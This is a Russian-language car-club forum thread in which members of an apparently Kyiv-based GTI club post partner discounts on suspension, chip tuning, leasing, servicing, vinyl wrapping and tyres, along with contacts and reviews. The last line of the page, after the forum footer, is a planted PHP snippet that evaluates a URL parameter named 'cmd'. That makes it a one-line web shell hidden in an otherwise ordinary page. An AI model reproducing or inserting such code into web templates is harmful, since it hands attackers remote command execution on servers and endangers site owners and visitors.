+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 15

Тема: ПАРТНЕРЫ КЛУБА


  1. #1
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885

    ПАРТНЕРЫ КЛУБА

    В этой теме информация о партнерах клуба. Итак:

    1) ООО "ДТС-Украина" www.koni-centre.com.ua
    Весь ассортимент продукции KONI и EIBACH (амортизаторы и пружины)
    Скидка для участников клуба - 20%
    Пока у нас нет клубных карточек, обращайтесь за скидкой через меня.

    2) "АТГ" http://tunning.atg.ua/
    Специальная цена на чип тюнинг для участников клуба - 450 у.е.
    Контактное лицо со стороны партнера - 457 57 01 Денис
    Контактное лицо со стороны клуба - Саша Gomkv

    Дали буде........

    Добавлено через 17 минут
    Сразу же отзыв по "ДТС Украина". Захотелось мне проапгрейдить подвеску и (хотя менеджер мне прозрачно намекал, что лучше взять серию Спорт) я купил у них комплект серии ФСД (типа саморегулирующиеся). Установил как положено у них. Сначала не почувствовал практически никакой разницы со стоком, эффект изменяющейся жесткости как-то особо не ощутил. Со временем (около 5000 км) подвеска стала просто раздражать - желеобразная на хорошем покрытии и при этом пробивается на раз на некриминальных ямах. Мрак, короче. Звоню в ДТС и объясняю ситуацию. И вот тут я реально был очень приятно удивлен просто супер лояльным подходом - нашли меня по базе, не потребовали вообще никаких документов подтверждающих гарантию, по телефону же подтвердили готовность заменить амортизаторы (т.к. ФСД на ФСД я менять категорически не хотел, без проблем согласились заменить на Спорт). Приехал в назначенный день, представитель ДТС осмотрел снятый с машины амортизатор ФСД и, хотя при прокачке он вел себя вполне нормально (т.е. его дефектность не проявилась), ориентируясь на мой рассказ о поведении подвески, мне поменяли амортизаторы по кругу на Спорт. Я оплатил только установку (что считаю вполне резонным). Честно говоря, я с таким подходом к гарантийным вопросам сталкиваюсь впервые и по-хорошему удивлен.

    Кстати Спортами я на данный момент весьма доволен - наконец-то получил четкую энергоемкую подвеску, в поворотах машина отлично стоит и при этом неровности проезжаются ходом без ощущения что колеса отвалятся. Она конечно жесткая, но жесткая по делу. По моим ощущениям довольно близко к подвеске на Сашиной С3.
    Последний раз редактировалось IvanGTIV; 12.05.2009 в 12:11. Причина: Добавлено сообщение

  2. #2

    Мойка

    И так дядьки тетки есть мойка которой Я лично доволен и могу порекомендовать для нашего клуба! Находится за тоетой на харьковском в метрах 150 по той же стороне. Ребята работают так как бы работали для себя сами без лишних замечаний зубной щеткой оттирают каждый диск и выхлопнуху дважды продувают воздухом все щели и тд и высококачественная химия которая не вредит хрому и резиновым уплотнителям и цена радует проверено мной не раз
    3d,5d gti, s3

  3. #3
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Внимание! Новый партнер! Специальные условия на 5 лизинговых контрактов!

    ООО «ПОРШЕ ЛИЗИНГ УКРАИНА» http://www.porscheleasing.com.ua
    Услуги по финансированию (лизингу) приобретения автомобилей VW и Audi

    Специальные условия для членов клуба – 5 лизинговых контрактов на особых условиях:

    Первый контракт:

    - без оплаты первого месячного платежа (!!!)
    - без платы за административные расходы (1,5% от суммы контракта (!))
    - без платы за постановку на учет в ГАИ

    Второй и третий контракты:

    - без платы за административные расходы (1,5% от суммы контракта (!))
    - без платы за постановку на учет в ГАИ

    Четвертый и пятый контракты:

    - административные расходы всего 0,5%
    - без платы за постановку на учет в ГАИ

    По всем контрактам отсутствует плата за досрочное погашение (в размере 4% от суммы)

    Как это работает?


    Предложение по лизингу на интересующий автомобиль или автомобили можно получить у любого официального дилера VW или Audi, после этого нужно обратиться ко мне для реализации специальных условий приведенных выше.

    Что такое лизинг?

    Если очень кратко – это продукт аналогичный кредиту, т.е. оплата в рассрочку.

    Преимущества лизинга по сравнению с кредитом:

    – доступность финансирования (как вы знаете с автокредитованием через банки сейчас весьма сложно)

    - привлекательные процентые ставки

    - оплата страховки автомобиля происходит частями помесячно (страховка при этом работает в полном объеме с первого дня).

    Отличие от кредита – формально до окончания выплат по лизингу собственником автомобиля является лизингодатель (Порше Лизинг Украина в нашем случае), если лизинговый контракт предусматривает нулевую остаточную стоимость, то по окончанию лизинговых платежей автомобиль автоматически переходит в собственность лизингополучателя. Более подробно узнать про лизинг от Порше Лизинг Украина можно здесь:

    www.porscheleasing.com.ua

    Пример лизингового предложения:

    Volkswagen Scirocco
    Cтоимость: USD 30 000
    Процентная ставка: 12,5% в долларах США
    Авансовый платеж (35%): USD 10 500
    Срок лизинга: 3 года
    Остаточная стоимость: 0
    Месячный платеж за страховку: USD 118,25
    Месячный лизинговый платеж: USD 677,44

    Лизинговое предожение по любому автомобилю VW или Audi можно получить у любого официального дилера, чтобы реализовать специальные условия для членов клуба, пожалуйста, обращайтесь ко мне через форум или на gticlubua@gmail.com



  4. #4
    GTI-Racing Serzh will become famous soon enough Serzh will become famous soon enough Аватар для Serzh
    Регистрация
    21.01.2008
    Откуда
    Киев
    Машина
    A4 Allroad
    Сообщений
    1,211

    Запчасти

    Кто то задавал вопрос о покупке ориганальных запчастей на ГТИ не у дилера.

    Когда я менял детали двигателя, то обращался по рекомендации к Леонид 8044 451 4696
    Доставили за одну неделю. Стоимость была ниже где-то 20%-25%.

    Я недавно менял правую шаровую из-за порваного пыльника, так заплатил ОД около 2 200 грн. только за деталь. Цуко дорого ...
    Последний раз редактировалось Serzh; 15.07.2013 в 12:54.
    MKV GTI APR Stage 2 - продан ((
    AUDI A4 allroad
    МB E280 4 MATIC - продан

  5. #5
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Ура Форсу! Урраааааааааааааааааа!!!!!!

    На АВТОМИРЕ, Любой участник нашего клуба, может без унижений, прошений и т.д. ОФИЦИАЛЬНО получить скидку 15% на запчасти, и 30% на РАБОТУ!!! В ЛЮБОЙ ДЕНЬ НЕДЕЛИ!

    Мастера приемщики уже проинструктированы насчет нашего клуба, и с радостью готовы с нами познакомиться! Обещали для нас сделать спец условия не только по ценам, но и по времени ремонта!

    Любые возникшие вопросы оперативно можете решать либо со мной, 8(063)232-55-85, или прямо на Автомире с ГЕРМАНОМ СЕРГЕЕМ! Это и есть начальник сервисного отдела, который очень будет рад если наш клуб будет обслуживаться у него!


    Координаты Автомира:
    8(044)566-00-40
    8(044)566-37-20
    ул.Бориспольская 7


    P.S. Особая благодарность Герману Сергею, и всему персоналу АВТОМИРА, за теплый прием, и желание помочь нашему движению!

    Добавлено через 23 часа 49 минут

    Добавлено через 23 часа 50 минут
    Друзья!

    Рад сообщить, что сегодня получены скидочные карточки Автосоюза для членов клуба. Карты VIP первого уровня - скидка на работы 20% (фиксированная), скидка на з/ч 15% (плавающая, думаю также как и 15% в Автомире плавающие). Карточки можно получить у меня. При следующем посещении Автосоюза нужно обратится к мастерам "ГТИ сервиса" Виталию Радзивилу или Руслану Иванову и по техпаспорту вашу карточку привяжут к скидочной программе и объявленному уровню скидок. При возникновении каких-то вопросов и непоняток, пожалуйста, обращайтесь ко мне (IvanGTIV).
    Последний раз редактировалось IvanGTIV; 28.08.2009 в 17:50. Причина: Добавлено сообщение

  6. #6
    Друзья, рад наконец то и спешу сообщить о новых партнёрах клуба! МОИ очень хорошие друзья, который я неоднократно уже рекомендовал по поклейке машин! Наконец то полностью поставили это направление на конвеер! Теперь у них все виды плёнок, свой бокс и т.д.

    Примеров поклейки много, делали и мои все машины, и моих друзей! В общем список такой:

    Внешний тюнинг - оформление автомобилей виниловыми пленками
    Художественная оклейка автомобилей изображениями фотографического качества
    Ламинирование поверхности автомобилей для защиты кузова от повреждений
    Брендирование корпоративного транспорта
    Реклама на автомобилях

    НОВИНКА: Поступила пленка Карбон 3D!!!

    Контакты:
    avto.vinil@gmail.com
    + 38 050 382 55 72
    + 38 044 592 32 50




  7. #7
    GTI-Racing DendisGTI is on a distinguished road Аватар для DendisGTI
    Регистрация
    10.02.2009
    Машина
    GTI-DSG
    Сообщений
    860
    Внимание! Новый партнер!
    Как я и говорил на прошедшей встрече, что у нас появился новый партнер
    ООО Всесезонка ( Интернет-магазин VSESEZONKA.COM)
    При встрече с Михаилом были названы следующие процентные ставки по скидкам: 10% на все услуги (шиномонтаж,ремонт дисков.....)
    20% сезонное хранение шин, а также возможное понижение цены на шины и диски, которое оговаривается в индивидуальном порядке.
    Скидки предоставляются при наличии клубных наклеек или рамок (для идентификации GTI-Club. При звонке и записи не забудьте указать, что вы из GTI-Club. В дальнейшем нам будет предоставлен менеджер, с которым мы будем связываться.
    Компания Всесезонка это:

    Интернет-магазин
    Код:
    http://vsesezonka.com/
    , услуга МОБИЛЬНЫЙ ШИНОМОНТАЖ, бесплатная ДОСТАВКА по Киеву, закачка шин газовой смесью PRO SIFE, ошиповка шин, профессиональный ремонт и восстановление автомобильных дисков, СЕЗОННОЕ ХРАНЕНИЕ ШИН, дисконтная система, АВТО ШИНЫ и АВТО ДИСКИ лучших мировых производителей, высокопрофессиональный персонал с индивидуальным подходом к каждому клиенту, гарантия качества на шины и диски.
    Консультацию Вы можете получить по:
    Тел.: 8 (044) 332-0-888,
    8 (044) 587-6-822
    8 (044) 232-1-000
    НОВЫЙ Адрес: г. Киев, Бортничи, ул. Карла Маркса, 7 ( на сайте компании есть схема проезда )
    ICQ: 324 957 047
    ICQ: 472 122 138
    Михаил Булатецкий - менеджер по работе с корпоративными клиентами




    От себя лично хочу добавить, что обслуживая там 5 машин, я полностью доволен качеством работ и дружественным отношением к клиенту.
    Последний раз редактировалось DendisGTI; 30.10.2009 в 19:16.

  8. #8
    Новый партнер клуба по резине!!!!!
    очень хорошие и вкусные цены
    Кого интересует резина брендов GOOD YEAR DUNLOP FULDA SAVA
    контакт через меня:)
    друзи только убедительная просьба самим определяться с брендом и моделью, а уж потом звонить спсб.
    Последний раз редактировалось Gomkv; 21.10.2009 в 18:39.
    3d,5d gti, s3

  9. #9
    GTI-Racing Serzh will become famous soon enough Serzh will become famous soon enough Аватар для Serzh
    Регистрация
    21.01.2008
    Откуда
    Киев
    Машина
    A4 Allroad
    Сообщений
    1,211
    Скажите у нас есть скидки на Атлант-М днепровская набережная??? А то много ГТИ на Харьковском, почему бы нам там не попробовать?? Ехать очень удобно.
    MKV GTI APR Stage 2 - продан ((
    AUDI A4 allroad
    МB E280 4 MATIC - продан

  10. #10
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631
    Там обслуживается очень мало GTI. Приемщик мне как-то это говорил.
    2-3 машины.

    Да и когда идет речь о нестандартных вещах - они буксуют сильно.
    Хотел себе поставить кнопки на руль, так мне сначала стали парить мульти руль, а потом согласились что вроде как возможно только кнопки докупить, взяли VIN и до сих пор перезванивают - год уж как прошел.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Встреча клуба
    от User в разделе Встречи и мероприятия
    Ответов: 43
    Последнее сообщение: 01.05.2023, 22:04
  2. ВСТРЕЧА КЛУБА 25.10.13!
    от GreyRabbit в разделе Встречи и мероприятия
    Ответов: 33
    Последнее сообщение: 26.10.2013, 20:58
  3. **Встреча клуба**
    от ™B®embo™ в разделе Встречи и мероприятия
    Ответов: 17
    Последнее сообщение: 23.12.2011, 23:01
  4. Ответов: 19
    Последнее сообщение: 08.05.2009, 23:42
  5. Встреча Клуба
    от TJ-616 в разделе Санкт-Петербург
    Ответов: 120
    Последнее сообщение: 19.07.2008, 15:45

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}